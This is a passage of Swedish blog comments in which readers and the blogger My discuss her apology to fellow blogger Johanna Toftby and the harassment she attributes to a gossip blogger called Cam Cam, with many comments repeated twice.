    • Hat kommentarer om Johanna? VART? Vad pratar du om? Folk inklusive jag själv och MÅNGA andra bloggare har tröttnat på att bli sparkade och påhoppade, AV Cam Cam. Så att man som läsare, bloggkollega, kvinna, mamma osv har en åsikt om Cam Cams beteende Det är inte konstigt….. Det är för för sjutton en moderna variant på häxjakt hon utför på mig m.f. Men Hat kommentarer om Johanna?

     • Du har redan svarat och väljer i det svaret att ignorera att det står elaka saker om Johanna i kommentaren du släppt igenom! Det var väl inte så svårt att förstå…

     • My – ”Lena PH” skriver i sin kommentar:

      ”JT kan du strunta i – hon är snart passé – hyvla ansiktet funkar väl ett par år till men sedan är det slut med att åma sig framför kameran så hon får hitta på nåt nytt och där finns ju inget annat än yta så – lär bli svårt.”

      DET är hatkommentaren som dina andra läsare syftar på. Att du släppte igenom den. Och där måste jag också säga att ja, det är lite konstigt att släppa igenom en sådan kommentar om du inte vill ha hat osv i ditt kommentarfält. Du kanske borde ta bort den.

     • Aha! Oj! Den kommentaren har jag missat.. En kommentar. Men dom hundratals mot mig. Dom är okay 😏 tack för infon. Den ska jag ta bort. Jag tycker att Johanna är jätte fräsch för sin ålder🙌🏻 Modogt att stå för att hon använder botox, fillers och hjälpmedel. DET ska man credda henne för! Att man brut sig om sitt utseende är jag inte emot, tvärt om! Ska ta bort den kommentaren för den har jag i ärlighetens namn inte sett! 😬 tack för info! 😊

 26. Jeeesus säger jag bara, jag har förstått att det varit lite svajigt minst sagt mellan dig, Magdalena, Johanna Toftby och hon med många barn Madde. Men då jag läser detta så förstår jag ändå inte hur stort detta är men jag förstår att det är större ändå. Nu kommer mina funderingar lite huller om buller här… Vet DU vem denna cam cam är? är det EN person? Det verkar för mig som om denna Cam Cam lägger bränsle på er eld. Jag tycker det är stort och bra av dig att skriva detta och jag hoppas verkligen för er skull att detta kan leda till något bra. Det kan väl vi som skriver och följer My´s blogg i alla fall bli goda exempel på. Fasen, det pågår krig runt våran knut och då menar jag riktiga krig, vi har människor som vi måste ta hand om på bästa sätt och vet man inte hur man ska göra så börja i din närhet som jag brukat säga till mina barn. Det är bra nog, gör gott och stötta de som inte mår bra, svara fint på tilltal och tacka för det du får och/eller allt du har. Många utav dessa som bråkar här i bloggvärden stöder ju faktiskt och bygger hus mm. åt dem som blir utsatta för våld och svält, det är otroligt fint gjort. Och skulle hälften av den kraften läggas på att hålla frid och god ton i närheten så skulle denna Cam Cam bli arbetslös. Kram och krya på dig My och som sagt stort av dig att gå ut för den goda sidan <3

 27. Man tror inte det är sant…
  Vuxna(!) människor..? Ja herregud…
  Håller fullt med dej, barn gör som vi gör, vi måste alla visa våra barn o ungdomar kärlek och respekt!
  Hur ska våra barn o ungdomar kunna veta att det inte är ok att mobba, näthata och FÖRTALA, när vi inte visar att det ÄR INTE OKEJ!!!
  Jag gillar dig och dina inlägg❤️, följer dig på instagram, läser sällan bloggar över lag, men din brukar jag kika in på då o då ?
  Keep up the good work My ! Kraaaam❤️

  • Håller med, låt de vara My hur mycket skit de än skriver du är mer än så fall inte ner på deras nivå. Gå vidare vilket du själv har sagt flera gånger även om det är svårt men det här är bara att elda på allt igen. Släpp det gamla och in med det nya!

   • Jag håller med dig, till 100%. Men ibland, när det leder till anmälningar, förhör, osv då kommer det ju till mig hur mycket jag än ”duckar”, blundar och håller för öronen.. Tanken är inte att lägga mig på ”samma nivå” Som Cam can. Jag ber henne att använda sitt även roliga, kreativa och fantasifulla sätt att skriva på ett positivt sätt istället.. =)

 28. Man tror inte det är sant…
  Vuxna(!) människor..? Ja herregud…
  Håller fullt med dej, barn gör som vi gör, vi måste alla visa våra barn o ungdomar kärlek och respekt!
  Hur ska våra barn o ungdomar kunna veta att det inte är ok att mobba, näthata och FÖRTALA, när vi inte visar att det ÄR INTE OKEJ!!!
  Jag gillar dig och dina inlägg❤️, följer dig på instagram, läser sällan bloggar över lag, men din brukar jag kika in på då o då 😊
  Keep up the good work My ! Kraaaam❤️

  • Håller med, låt de vara My hur mycket skit de än skriver du är mer än så fall inte ner på deras nivå. Gå vidare vilket du själv har sagt flera gånger även om det är svårt men det här är bara att elda på allt igen. Släpp det gamla och in med det nya!

   • Jag håller med dig, till 100%. Men ibland, när det leder till anmälningar, förhör, osv då kommer det ju till mig hur mycket jag än ”duckar”, blundar och håller för öronen.. Tanken är inte att lägga mig på ”samma nivå” Som Cam can. Jag ber henne att använda sitt även roliga, kreativa och fantasifulla sätt att skriva på ett positivt sätt istället.. =)

 29. Undrar om hon skulle våga komma fram toll dig face to face och ifrågasätta allting?!
  Stackars människa, kan ju inte må bra alltså .
  Du är grym My, en riktig förebild och kämpe!
  All styrka till dig ❤?

 30. Du är verkligen klok för din ålder. Tycker verkligen att det är bra att du gör allt för att lägga detta bakom dig. Har man den inställningen till livet och människor runt omkring sig kommer man långt. Ödmjukhet och godhet kommer man långt med. Ingen ide att lägga energi på människor som bara ändå vill skapa skit. Man måste inte älska alla,men man ska acceptera och respektera alla. Jag tycker att det ska vara mer godhet ,kärlek och omtanke,både i bloggvärlden och ”vanliga ”världen. Skickar en stor varm kram till dig My ,bra jobbat.

 31. Usch vilken vidrig människa! ?
  Tyvärr är det såna människor som CamCam och dennes läsare som har dom största problemen själv.
  Det är bevisligen så att varken h*n eller hennes läsare mår bra, för vad har annars människan för nytta av att trycka ner andra?
  Tyvärr är kvinnor ofta väldigt nitiska mot andra kvinnor och det krävs nog ett ganska stort arbete med sig själv för att kunna tänka och agerar rätt.
  Jag tror att många tänkt som citatet nedan:
  ”- Fan vilket fint hår hon har! Tänk om mitt hår kunde se ut sådär! Fan så avis jag är för att hon har just det jag vill ha! Vilken subba! Åh jag hatar henne (jag kommer aldrig bli lika snygg) och dessutom så är hon säkert inte trevlig. Usch. Om jag berättar för alla hur otrevlig och konstig hon är så lägger ingen märke till hur snygg/trevlig hon är och jag växer som människa”
  Gå ihop och gör en polisanmälan på människan. Det h*n skriver är ju f-n skamligt!
  Fortsätt kämpa. Tänk på att h*n är sjuk.
  Kraam.

 32. Undrar om hon skulle våga komma fram toll dig face to face och ifrågasätta allting?!
  Stackars människa, kan ju inte må bra alltså .
  Du är grym My, en riktig förebild och kämpe!
  All styrka till dig ❤💕

 33. Du är verkligen klok för din ålder. Tycker verkligen att det är bra att du gör allt för att lägga detta bakom dig. Har man den inställningen till livet och människor runt omkring sig kommer man långt. Ödmjukhet och godhet kommer man långt med. Ingen ide att lägga energi på människor som bara ändå vill skapa skit. Man måste inte älska alla,men man ska acceptera och respektera alla. Jag tycker att det ska vara mer godhet ,kärlek och omtanke,både i bloggvärlden och ”vanliga ”världen. Skickar en stor varm kram till dig My ,bra jobbat.

 34. Usch vilken vidrig människa! 😡
  Tyvärr är det såna människor som CamCam och dennes läsare som har dom största problemen själv.
  Det är bevisligen så att varken h*n eller hennes läsare mår bra, för vad har annars människan för nytta av att trycka ner andra?

  Tyvärr är kvinnor ofta väldigt nitiska mot andra kvinnor och det krävs nog ett ganska stort arbete med sig själv för att kunna tänka och agerar rätt.
  Jag tror att många tänkt som citatet nedan:
  ”- Fan vilket fint hår hon har! Tänk om mitt hår kunde se ut sådär! Fan så avis jag är för att hon har just det jag vill ha! Vilken subba! Åh jag hatar henne (jag kommer aldrig bli lika snygg) och dessutom så är hon säkert inte trevlig. Usch. Om jag berättar för alla hur otrevlig och konstig hon är så lägger ingen märke till hur snygg/trevlig hon är och jag växer som människa”

  Gå ihop och gör en polisanmälan på människan. Det h*n skriver är ju f-n skamligt!

  Fortsätt kämpa. Tänk på att h*n är sjuk.

  Kraam.

 35. Men allvarligt vad är det för fel på folk. Har man verkligen inget bättre för sig än att såra andra människor så borde man nog söka hjälp å ta tag i sina egna problem.
  Jag fattar inte hur du orkar?!
  Jag är grymt imponerad av dig och din målmedvetenhet! Det är väl just det som sticker folk i ögonen att du är stark och struntar i alla idioter.
  Du verkar vara en helt fantastik mamma åt din son!
  Tack för en härlig å ärlig blogg!
  Kram Linda

 36. Fy vilken vidrig person hon är och vet du vad. HON (Cam Cam) om någon vet hur det är att bli nedringd och mailat till jobbet. Hon har fått uppleva samma sak. Fler vet vem hon är och många har mailat till kundtjänsten och ringt för att de avskyr hennes blogg. Hat föder hat som du skriver, men hon borde vetat att det är jobbigt, hon fick och har fått behålla jobbet men det kunde ju slutat illa och ändå backar hon inte.
  Jag läser inte hennes blogg för att jag inte vill bidra med läsarsiffror på en sån skitblogg, precis som med Bloggkommentatorerna, det är bara hat och ingen säger till. Jag läste den förr, kommenterade flitigt men jävlar i gatan vilket hat det blev, alla bara väntar runt hörnet på att nästa ”offer” ska komma för att tolka om alla ord man skriver ut till något negativt och hatiskt och sen flår de en levande. Så jädrans mycket hat på nätet att man blir sorgsen över hur dessa människor mår.
  Ang stavfel, vem bryr sig liksom? Det är ingen bok man skriver som Elaine Eksvärd skrev. Det är en blogg, som man många gånger skriver i all hast och till och med via mobil, det blir fel, vare sig man har dyslexi eller inte. Det är bra att du inte skäms, för det ska du verkligen inte göra.
  Jag beklagar My, att du mått så dåligt som du gjort med alla dessa hemska påhopp, du verkar vara en människa som absolut inte förtjänar det. Konstigt nog är det vi som inte menar något illa till andra, som råkar ut för en massa konstigt skit, du vet vad jag syftar på… Men vi får fortsätta kämpa, kill’em with kindess.
  Ditt inlägg är kanonbra, bra skrivet, bra stil och lugn. Du är en fin, stark, bra människa. <3
  Kram

 37. Hej My,
  Om du nu menar att du är uppriktigt ledsen för ditt agerande och vill be Johanna om ursäkt. Varför länkar du till det du nu ber om ursäkt för? jag förstår verkligen inte det!
  Ta då bort dom 1-2-3 inläggen om Johanna då om det är de du ber om ursäkt för.
  Så genomskinligt! Allt för att få trafik till bloggen.

  • 1-2-3 inlägg om Johanna? Jag svarade på hennes inlägg. Jag BER om URSÄKT för just det. jag borde ha stått över och ådrig gjort det. jag svarade i självförsvar och affekt, efter hennes inlägg. DET var fel. Det står jag för. Att ta bort inlägg som legat uppe i flera år känns bara konstigt. jag soppar inget under mattan. jag står för det jag både säger och gör. Jag har fått både hat och skr ifrån henne och hennes läsare genom åren. Det är nog svårt för oss båda att hitta, radera och ta bort allt. Det kommer alltid finnas kvar in olika forum.. DET är inte poängen. Jag bad om ursäkt, jag har förklarat varför. Detta pga av att Cam Cam drog igång cirkusen IGEN. Thats It. Detta blir bara en återupprepning av mitt inlägg… Läs gärna igen, eller utveckla din fråga om du vill att jag ska förklara så att du förstår.. Om du vill. Med vänlig hälsning, My

 38. Men allvarligt vad är det för fel på folk. Har man verkligen inget bättre för sig än att såra andra människor så borde man nog söka hjälp å ta tag i sina egna problem.
  Jag fattar inte hur du orkar?!
  Jag är grymt imponerad av dig och din målmedvetenhet! Det är väl just det som sticker folk i ögonen att du är stark och struntar i alla idioter.
  Du verkar vara en helt fantastik mamma åt din son!
  Tack för en härlig å ärlig blogg!
  Kram Linda

 39. Det är verkligen sorgligt, precis som du skriver så borde vi kvinnor hålla ihop och stötta varandra, inte ta första bästa chans att sänka varandra. Du är modig och stark som skriver det här inlägget, och jag hoppas att samtliga mottagare förstår din intention och kan ta emot den. Jag har läst Camillas inlägg några gånger i samband med att andra bloggare varit utsatta och länkat dit, och kommentarsfältet är alltid lika otäckt. Det är som om följarna går in i masspsykos när de får blodvittring och bara river och sliter i människor utan en tanke på att de är av kött och blod och har känslor som alla andra. Mycket obehagligt, förhoppningsvis får det snart ett slut.

 40. Fy vilken vidrig person hon är och vet du vad. HON (Cam Cam) om någon vet hur det är att bli nedringd och mailat till jobbet. Hon har fått uppleva samma sak. Fler vet vem hon är och många har mailat till kundtjänsten och ringt för att de avskyr hennes blogg. Hat föder hat som du skriver, men hon borde vetat att det är jobbigt, hon fick och har fått behålla jobbet men det kunde ju slutat illa och ändå backar hon inte.

  Jag läser inte hennes blogg för att jag inte vill bidra med läsarsiffror på en sån skitblogg, precis som med Bloggkommentatorerna, det är bara hat och ingen säger till. Jag läste den förr, kommenterade flitigt men jävlar i gatan vilket hat det blev, alla bara väntar runt hörnet på att nästa ”offer” ska komma för att tolka om alla ord man skriver ut till något negativt och hatiskt och sen flår de en levande. Så jädrans mycket hat på nätet att man blir sorgsen över hur dessa människor mår.

  Ang stavfel, vem bryr sig liksom? Det är ingen bok man skriver som Elaine Eksvärd skrev. Det är en blogg, som man många gånger skriver i all hast och till och med via mobil, det blir fel, vare sig man har dyslexi eller inte. Det är bra att du inte skäms, för det ska du verkligen inte göra.

  Jag beklagar My, att du mått så dåligt som du gjort med alla dessa hemska påhopp, du verkar vara en människa som absolut inte förtjänar det. Konstigt nog är det vi som inte menar något illa till andra, som råkar ut för en massa konstigt skit, du vet vad jag syftar på… Men vi får fortsätta kämpa, kill’em with kindess.
  Ditt inlägg är kanonbra, bra skrivet, bra stil och lugn. Du är en fin, stark, bra människa. <3

  Kram

 41. Varför släpper du igenom hennes kommentarer och överhuvudtaget läser hennes blogg om den nu är så hemsk, verkar som om du maniskt följer bloggbevakning och länkar hennes inlägg för att få mer följare och lite sympati av dem… som ex.Johanna Toftby du årerkommer med jämna mellanrum hur illa hon behandlat dig och även där länkar, är det för att du försöker snylta åt dig hennes följare? Vill du få lugn och ro så skit i att läsa bloggbevakning och länka hennes inlägg…. Men förstår varför du gör det, är ju bara att du ska få mer följare och vara i focus, för att hålla bloggen vid liv…. annars en tråkig blogg.

  • Hej Marre! Nja, nu har du både rätt och fel…. Jag har i månader blivit utsatt för Cam Cams inlägg. Dom kommer upp i mitt kommentarsfält. Dom får konsekvenser på olika sätt, tex, så som att SATS blev nerringda och den turbulens det medföljde. Så man behöver inte följa hennes blogg för att få hennes rapporteringar. Jag haft inte nämnt Toftby i ett inlägg sedan just 2015. Då jag svarade i affekt och självförsvar. Vilket jag igår bad om ursäkt om. Då jag precis som jag skrev borde stått över och aldrig skrivit inlägget. Mer komplicerat än så är det inte.. Sympati eller inte. Jag har fått nog av anmälningar, mobbning och näthat. Jag tog upp Johanna och ba dom ursäkt FÖR att Cam Cam bloggade om mig och Johannas tidigare gräl, vilket då satte igång cirkusen igen..

 42. Hej My,

  Om du nu menar att du är uppriktigt ledsen för ditt agerande och vill be Johanna om ursäkt. Varför länkar du till det du nu ber om ursäkt för? jag förstår verkligen inte det!

  Ta då bort dom 1-2-3 inläggen om Johanna då om det är de du ber om ursäkt för.

  Så genomskinligt! Allt för att få trafik till bloggen.

  • 1-2-3 inlägg om Johanna? Jag svarade på hennes inlägg. Jag BER om URSÄKT för just det. jag borde ha stått över och ådrig gjort det. jag svarade i självförsvar och affekt, efter hennes inlägg. DET var fel. Det står jag för. Att ta bort inlägg som legat uppe i flera år känns bara konstigt. jag soppar inget under mattan. jag står för det jag både säger och gör. Jag har fått både hat och skr ifrån henne och hennes läsare genom åren. Det är nog svårt för oss båda att hitta, radera och ta bort allt. Det kommer alltid finnas kvar in olika forum.. DET är inte poängen. Jag bad om ursäkt, jag har förklarat varför. Detta pga av att Cam Cam drog igång cirkusen IGEN. Thats It. Detta blir bara en återupprepning av mitt inlägg… Läs gärna igen, eller utveckla din fråga om du vill att jag ska förklara så att du förstår.. Om du vill. Med vänlig hälsning, My

 43. Det är verkligen sorgligt, precis som du skriver så borde vi kvinnor hålla ihop och stötta varandra, inte ta första bästa chans att sänka varandra. Du är modig och stark som skriver det här inlägget, och jag hoppas att samtliga mottagare förstår din intention och kan ta emot den. Jag har läst Camillas inlägg några gånger i samband med att andra bloggare varit utsatta och länkat dit, och kommentarsfältet är alltid lika otäckt. Det är som om följarna går in i masspsykos när de får blodvittring och bara river och sliter i människor utan en tanke på att de är av kött och blod och har känslor som alla andra. Mycket obehagligt, förhoppningsvis får det snart ett slut.

 44. Varför släpper du igenom hennes kommentarer och överhuvudtaget läser hennes blogg om den nu är så hemsk, verkar som om du maniskt följer bloggbevakning och länkar hennes inlägg för att få mer följare och lite sympati av dem… som ex.Johanna Toftby du årerkommer med jämna mellanrum hur illa hon behandlat dig och även där länkar, är det för att du försöker snylta åt dig hennes följare? Vill du få lugn och ro så skit i att läsa bloggbevakning och länka hennes inlägg…. Men förstår varför du gör det, är ju bara att du ska få mer följare och vara i focus, för att hålla bloggen vid liv…. annars en tråkig blogg.

  • Hej Marre! Nja, nu har du både rätt och fel…. Jag har i månader blivit utsatt för Cam Cams inlägg. Dom kommer upp i mitt kommentarsfält. Dom får konsekvenser på olika sätt, tex, så som att SATS blev nerringda och den turbulens det medföljde. Så man behöver inte följa hennes blogg för att få hennes rapporteringar. Jag haft inte nämnt Toftby i ett inlägg sedan just 2015. Då jag svarade i affekt och självförsvar. Vilket jag igår bad om ursäkt om. Då jag precis som jag skrev borde stått över och aldrig skrivit inlägget. Mer komplicerat än så är det inte.. Sympati eller inte. Jag har fått nog av anmälningar, mobbning och näthat. Jag tog upp Johanna och ba dom ursäkt FÖR att Cam Cam bloggade om mig och Johannas tidigare gräl, vilket då satte igång cirkusen igen..

 45. Varför är kvinnor så mot varandra? Så fort man inte tuttinuttar varandra och talar om hur vacker och bra man är…då baktalas det och man vräker ur sig det ena dumma efter det andra.
  Herregud det finns väl läsare så det räcker till alla som bloggar. Även om 2, 5, 25, 75 eller 3573 st bloggar om samma sak. Man kan följa 10 st som skriver om samma för att dom har en trevlig personlighet, för att trots att dom skriver om samma kanske lägger fram det lite olika vilket kan ge a-haeffekt.
  Jag förstår oxå varför jag i alla år haft fler killkompisar än tjejkompisar…jag avskyr smutskastning och skitsnack…och skitsnack som förekommer hos tjejer/kvinnor är på sandlådenivå. Finns få kvinnor som är äkta och genuina och dom högaktar jag.
  Önskar alla med lite innanför pannbenet en underbar dag…
  Kram fina My

 46. My eftersom du skriver att du ångrar och ber Johanna om ursäkt. Du måste verkligen ta hjälp med vad du ska skriva om i fortsättningen. Du kan inte få hålla på så här. Du ber inte Johanna om ursäkt, då hade du tagit BORT ALLT skit om henne. Dåligt att du släpper fram inlägg om Johanna som är helt missvisande.

  • Jag ber om ursäkt för inlägget. som jag skrev i SJÄLVFÖRSVAR efter hennes inlägg. Det vart dumt. jag skulle stått över och inte lagt mig på den nivån. DET ber jag om ursäkt om. Nu, några år senare så drog Cam Cam upp det igen. Därav att jag svarvade på det ännu en gång. Nu vill jag bara bli lämnad ifred….

 47. Varför är kvinnor så mot varandra? Så fort man inte tuttinuttar varandra och talar om hur vacker och bra man är…då baktalas det och man vräker ur sig det ena dumma efter det andra.
  Herregud det finns väl läsare så det räcker till alla som bloggar. Även om 2, 5, 25, 75 eller 3573 st bloggar om samma sak. Man kan följa 10 st som skriver om samma för att dom har en trevlig personlighet, för att trots att dom skriver om samma kanske lägger fram det lite olika vilket kan ge a-haeffekt.

  Jag förstår oxå varför jag i alla år haft fler killkompisar än tjejkompisar…jag avskyr smutskastning och skitsnack…och skitsnack som förekommer hos tjejer/kvinnor är på sandlådenivå. Finns få kvinnor som är äkta och genuina och dom högaktar jag.

  Önskar alla med lite innanför pannbenet en underbar dag…

  Kram fina My

 48. My eftersom du skriver att du ångrar och ber Johanna om ursäkt. Du måste verkligen ta hjälp med vad du ska skriva om i fortsättningen. Du kan inte få hålla på så här. Du ber inte Johanna om ursäkt, då hade du tagit BORT ALLT skit om henne. Dåligt att du släpper fram inlägg om Johanna som är helt missvisande.

  • Jag ber om ursäkt för inlägget. som jag skrev i SJÄLVFÖRSVAR efter hennes inlägg. Det vart dumt. jag skulle stått över och inte lagt mig på den nivån. DET ber jag om ursäkt om. Nu, några år senare så drog Cam Cam upp det igen. Därav att jag svarvade på det ännu en gång. Nu vill jag bara bli lämnad ifred….

 49. Härliga My, starkt av dig att offentligt erkänna ditt misstag och be om ursäkt, du kommer iaf att gå rakryggad ur det här. Gå nu vidare och släpp all skit bakom dig, jag håller tummarna för dig och din framtid. Kram Madde

 50. Åh herr Gud… man blir ju helt matt. VARFÖR sprida så mycket hat och missömsamhet då man kan sprida kärlek och glädje? Lider med dig My. Det känns som att du bara får massa skit, oavsett vad du gör. Eller mår för den delen. Vill bara ge dig en stor varm kram och säga att allt kommer att bli bra ?

 51. Vilken sorglig läsning My, klart att du blir ledsen! Jag känner inte till den här bloggen men blir inte nyfiken på den heller. Min protest mot elaka skvallerbloggar innebär att inte gå in på dem alls.

 52. Ja jisses….
  Men som du säger, den enda man kan ändra på är sig själv.
  Tycker det du gör är fint. Jag skulle nog inte kunna be om ursäkt så när man blivit illa behandlad.
  Men om man gör det för att må bättre och för att sprida glädje så är det ju fantastiskt!
  Två tänkvärda citat:
  Brottas aldrig med en gris, ni blir båda lortiga och grisen gillar det.
  I have decided to stick with love. Hate is too great a burden to bear.
  KRAM

  • ”Brottas aldrig med en gris, ni blir båda lortiga och grisen gillar det” ÄLSKAR’t! Du har gjort min kväll! Ibland gäller det att vara storsint och stå över. Jag gjorde inte det då. Jag be om ursäkt för just det. jag gör det nu … Kram <3

 53. Härliga My, starkt av dig att offentligt erkänna ditt misstag och be om ursäkt, du kommer iaf att gå rakryggad ur det här. Gå nu vidare och släpp all skit bakom dig, jag håller tummarna för dig och din framtid. Kram Madde

 54. Åh herr Gud… man blir ju helt matt. VARFÖR sprida så mycket hat och missömsamhet då man kan sprida kärlek och glädje? Lider med dig My. Det känns som att du bara får massa skit, oavsett vad du gör. Eller mår för den delen. Vill bara ge dig en stor varm kram och säga att allt kommer att bli bra 💖

 55. My, jag förvånas ständigt över att du inte förstår detta drev och hat mot dig?
  Det är ren och skär avundsjuka dör att du är ung, driven och vacker.
  Just att du ser bra ut sticker i mångas ögon kan jag tänka mig. Varför annars detta hat?
  Glöm inte att en mobbare är en rädd liten skit som mår mycket, mycket dåligt. M a n lobbar inte om man är nöjd med sig själv och ditt liv.
  Hat kommer av att man har dålig självkänsla och kandje själv blivit behandad dåligt. Men det ursäktar absolut inget!
  Jag hade slutat blogga, hade aldrig klarat av det du får höra. Du måste vara otroligt stark.

 56. Vilken sorglig läsning My, klart att du blir ledsen! Jag känner inte till den här bloggen men blir inte nyfiken på den heller. Min protest mot elaka skvallerbloggar innebär att inte gå in på dem alls.

 57. Ja jisses….
  Men som du säger, den enda man kan ändra på är sig själv.
  Tycker det du gör är fint. Jag skulle nog inte kunna be om ursäkt så när man blivit illa behandlad.
  Men om man gör det för att må bättre och för att sprida glädje så är det ju fantastiskt!
  Två tänkvärda citat:
  Brottas aldrig med en gris, ni blir båda lortiga och grisen gillar det.
  I have decided to stick with love. Hate is too great a burden to bear.
  KRAM

  • ”Brottas aldrig med en gris, ni blir båda lortiga och grisen gillar det” ÄLSKAR’t! Du har gjort min kväll! Ibland gäller det att vara storsint och stå över. Jag gjorde inte det då. Jag be om ursäkt för just det. jag gör det nu … Kram <3

 58. Nu har ju Johanna svarat/kontrat med att lägga upp en bild på camcam som om de är bästisar, och försvarar bloggbevaknkng med orden ”man får tycka och skriva vad man vill”. Mmm det gäller ju dock inte när man kritiserar henne, hennes familj eller vänner. Lilla Johanna du är så patetisk, så fejk, så ”allt för mycket av allt”. Men som sagt hat föder hat så vi struntar i det My<3 . Kärlek glädje omtänksamhet lägger vi fokus på. Och ordspråket "att ha ett mjukt hjärta i en grym värld är mod inte svaghet".

  • Ojojoj! jag tror mina öron trillar av. Eller rättare sagt ögonen ploppar ut! HUR kan man offentligt hylla hur en person förtalar, anmäler och driver fram näthat! och i SAMMA inlägg skiva att man är emot näthat?
   Att bästa sättet är att ignorera påhopp och inlägg från Cam Cam. För min del gick det inte ignorera. Hela STAS ledning blev inkopplad, kollegor, RO, SOC, förhör, efter förhör. FY FAN rent ut sagt!
   och alla andra bieffekter som kommer genom Cam Cams inlägg… Det är ju inte klokt. HUR kan man försvara ett sådant beteende? Herre min gud! Man slutar aldrig förvånas.

 59. My, jag förvånas ständigt över att du inte förstår detta drev och hat mot dig?

  Det är ren och skär avundsjuka dör att du är ung, driven och vacker.

  Just att du ser bra ut sticker i mångas ögon kan jag tänka mig. Varför annars detta hat?

  Glöm inte att en mobbare är en rädd liten skit som mår mycket, mycket dåligt. M a n lobbar inte om man är nöjd med sig själv och ditt liv.

  Hat kommer av att man har dålig självkänsla och kandje själv blivit behandad dåligt. Men det ursäktar absolut inget!

  Jag hade slutat blogga, hade aldrig klarat av det du får höra. Du måste vara otroligt stark.

 60. Nu har ju Johanna svarat/kontrat med att lägga upp en bild på camcam som om de är bästisar, och försvarar bloggbevaknkng med orden ”man får tycka och skriva vad man vill”. Mmm det gäller ju dock inte när man kritiserar henne, hennes familj eller vänner. Lilla Johanna du är så patetisk, så fejk, så ”allt för mycket av allt”. Men som sagt hat föder hat så vi struntar i det My<3 . Kärlek glädje omtänksamhet lägger vi fokus på. Och ordspråket "att ha ett mjukt hjärta i en grym värld är mod inte svaghet".

  • Ojojoj! jag tror mina öron trillar av. Eller rättare sagt ögonen ploppar ut! HUR kan man offentligt hylla hur en person förtalar, anmäler och driver fram näthat! och i SAMMA inlägg skiva att man är emot näthat?

   Att bästa sättet är att ignorera påhopp och inlägg från Cam Cam. För min del gick det inte ignorera. Hela STAS ledning blev inkopplad, kollegor, RO, SOC, förhör, efter förhör. FY FAN rent ut sagt!
   och alla andra bieffekter som kommer genom Cam Cams inlägg… Det är ju inte klokt. HUR kan man försvara ett sådant beteende? Herre min gud! Man slutar aldrig förvånas.

 61. Hon försvar bloggbevakning endast för att hon njuter av att det krossar dig, vrider om kniven i magen yttligare, eller försöker iaf, och endast för att få camcam på sin sida. Och hon försöker få ännu en person med på sitt tåg, MOT dig. Hon småler nog när hon skriver inlägget. Och hon gör det isande kallt. Läskigt med en sån människa. Måtte hon inte få makt i sina händer någon dag.

 62. Hon försvar bloggbevakning endast för att hon njuter av att det krossar dig, vrider om kniven i magen yttligare, eller försöker iaf, och endast för att få camcam på sin sida. Och hon försöker få ännu en person med på sitt tåg, MOT dig. Hon småler nog när hon skriver inlägget. Och hon gör det isande kallt. Läskigt med en sån människa. Måtte hon inte få makt i sina händer någon dag.

 63. Men att du slarvar med att markera ut samarbeten på ett korrekt sätt och sen blir anmäld till konumentverket, det kan du inte skylla på Camilla. Du praktiskt taget ber om det när du inlägg efter inlägg fullständigt struntar i att markera dina samarbeten korrekt. I det fallet får du faktiskt ta dig i kragen och FÖLJA LAGEN istället för att skylla ifrån dig på att någon med många läsare uppmärksammar ditt slarv.

  • Amanda. Jag har försökt markerat ut alla mina inlägg med samarbeten sedan några år tillbaka. Att jag precis som du skriver på ren slarv har missat det nära gånger. Ja, det kan jag absolut ta på mig. Det har hänt, enstaka gånger och det är ingenting som jag nekar till. jag har ALDRIG försökts att dölja det. Bloggen behöver samarbeten och sponsrade inlägg. Utan sporrade inlägg ingen blogg. Utan sponsrade inlägg ingen lön dör mig. Jag behöver en lön för att överleva. Bloggen är mitt jobb.Inte mer komplicerat än så. Förr köpte man annonsering i tidningar, och på telefon kataloger. Idag k,öpar mans det på nätet. Inte konstigt als.Jag personligen väljer mina samarbeten med omsorg. Bara sale JAG vill och kan stå för. Det tror jag iof at många gör. Annars är man rökt ganska snabbt och deg genomskådas. Jag fick nyligen frågan om att marknadsföra en bil. en bilkampanj på 6 mån. Jag blev erbjuden ganska mycket pengar, trots det valde jag att tacka nej. MEN, därifrån. Till att Ringa ner SATS, till att ta mina meningar ur sitt, för att på Cam Cams blogg bygga upp en ny konversation. Att hänga ut min son. Min x-mans tonårspojkar (oskyldiga barn). Att anmäla mig till RO, till SOC, och till SATS. Jag var ny på jobbet, ny examinerad och hade inte ljust om någonting. Ska man för att man även har valt yreka som bloggare behöva ta det? ”har man gett sig in i leken så får man leken tåla” ?
   att sedan Cam Cam, låter det ske eh hetsjakt och en mobbning i kommentarsfältet där man påstår att jag legat både till höger och vänster. man påstår at jag är psykiskt sjuk. och HUNDRA grejer till. -Är det att ta ansvar och vara en förebild? Nej, det är det banne mig inte okay! Det är personangrepp, trakasserier och påhopp! Tyvärr Amanda så handlar nog detta om mycket annat än att följa just lagen. Du har helt rätt. Samarbeten ska markeras. Absolut. Ska jag kallas psyksjuka, mytoman, och behöva sitt i X-ANTAL förhör för det? för att jag vid 2 tillfällen missade just det? Liiiiite hårt kan jag tycka….

   • Polisanmäl henne My, å sen låter du de som håller på å trakasserar dig vara. Det dom gör å säger, säger ingenting om dig. Utan det säger ju nåt om hur dom är…………. Kram på dig ? <3

 64. Men att du slarvar med att markera ut samarbeten på ett korrekt sätt och sen blir anmäld till konumentverket, det kan du inte skylla på Camilla. Du praktiskt taget ber om det när du inlägg efter inlägg fullständigt struntar i att markera dina samarbeten korrekt. I det fallet får du faktiskt ta dig i kragen och FÖLJA LAGEN istället för att skylla ifrån dig på att någon med många läsare uppmärksammar ditt slarv.

  • Amanda. Jag har försökt markerat ut alla mina inlägg med samarbeten sedan några år tillbaka. Att jag precis som du skriver på ren slarv har missat det nära gånger. Ja, det kan jag absolut ta på mig. Det har hänt, enstaka gånger och det är ingenting som jag nekar till. jag har ALDRIG försökts att dölja det. Bloggen behöver samarbeten och sponsrade inlägg. Utan sporrade inlägg ingen blogg. Utan sponsrade inlägg ingen lön dör mig. Jag behöver en lön för att överleva. Bloggen är mitt jobb.Inte mer komplicerat än så. Förr köpte man annonsering i tidningar, och på telefon kataloger. Idag k,öpar mans det på nätet. Inte konstigt als.Jag personligen väljer mina samarbeten med omsorg. Bara sale JAG vill och kan stå för. Det tror jag iof at många gör. Annars är man rökt ganska snabbt och deg genomskådas. Jag fick nyligen frågan om att marknadsföra en bil. en bilkampanj på 6 mån. Jag blev erbjuden ganska mycket pengar, trots det valde jag att tacka nej. MEN, därifrån. Till att Ringa ner SATS, till att ta mina meningar ur sitt, för att på Cam Cams blogg bygga upp en ny konversation. Att hänga ut min son. Min x-mans tonårspojkar (oskyldiga barn). Att anmäla mig till RO, till SOC, och till SATS. Jag var ny på jobbet, ny examinerad och hade inte ljust om någonting. Ska man för att man även har valt yreka som bloggare behöva ta det? ”har man gett sig in i leken så 